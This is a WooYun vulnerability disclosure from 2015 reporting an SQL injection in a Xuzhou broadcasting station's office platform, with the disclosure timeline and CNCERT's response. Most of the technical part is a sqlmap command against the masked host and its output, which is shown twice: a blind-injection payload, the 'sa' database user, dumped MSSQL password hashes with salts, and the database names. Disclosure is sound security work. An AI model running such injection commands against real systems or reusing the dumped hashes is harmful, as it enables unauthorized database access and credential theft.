当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142149

漏洞标题:某广播电视台办公平台存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-24 09:25

修复时间:2015-11-13 00:46

公开时间:2015-11-13 00:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

徐州广播电视台协同办公平台存在SQL注入

详细说明:

sqlmap -u "http://**.**.**.**/homepage/LoginHomepage.jsp?hpid=7&isfromportal=1&templateId=5&null&templateId=5&null" -p hpid --dbms=MSSQL --current-user --passwords --is-dba


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: hpid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hpid=7 AND 5129=5129&isfromportal=1&templateId=5&null&templateId=5&null
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] sa [1]:
password hash: 0x010056049b0ea465725aa5fea5dbb27cbd5478527abab116e980
header: 0x0100
salt: 56049b0e
mixedcase: a465725aa5fea5dbb27cbd5478527abab116e980
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

漏洞证明:

屏幕快照 2015-09-19 上午2.47.21.png


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: hpid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hpid=7 AND 5129=5129&isfromportal=1&templateId=5&null&templateId=5&null
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] sa [1]:
password hash: 0x010056049b0ea465725aa5fea5dbb27cbd5478527abab116e980
header: 0x0100
salt: 56049b0e
mixedcase: a465725aa5fea5dbb27cbd5478527abab116e980
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-29 00:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无